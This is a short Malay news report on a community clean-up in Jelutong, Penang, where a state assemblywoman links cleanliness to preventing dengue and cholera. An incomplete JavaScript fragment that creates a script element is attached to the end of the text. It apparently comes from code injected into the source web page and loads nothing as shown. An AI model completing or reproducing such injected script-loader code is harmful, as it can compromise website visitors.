Sepakat jaga kebersihan basmi penyakit berjangkit

SEPAKAT JAGA KEBERSIHAN… Ahli Dewan Undangan Negeri (ADUN) Sungai Pinang, Lim Siew Khim baru-baru ini sepakat dan turun padang untuk terlibat sama dalam aktiviti gotong-royong anjuran Jawatankuasa Kemajuan dan Keselamatan Komuniti (JKKK) Jelutong bersama-sama Majlis Bandaraya Pulau Pinang (MBPP) di Pangsapuri Mutiara Idaman 1 di sini.

Katanya, selain melahirkan masyarakat yang sihat, aktiviti gotong-royong juga secara tidak langsung dapat memupuk perpaduan dan keharmonian kaum berbilang bangsa.

“Malah, yang paling penting adalah aktiviti gotong-royong dapat membasmi penyakit berjangkit yang disebabkan faktor kebersihan seperti denggi dan taun dari menular,” katanya pada majlis berkaitan.

Turut hadir, Ahli Parlimen Jelutong, Jeff Ooi Chuan Aun; Ahli Majlis MBPP, Saiful Azwan Abd. Malik; Pengerusi JKKK Jelutong, Mohd. Naser Ismail dan Pengerusi Persatuan Penduduk Pangsapuri Mutiara Idaman 1, Othman Daud.var d=document;var s=d.createElement(‘script’);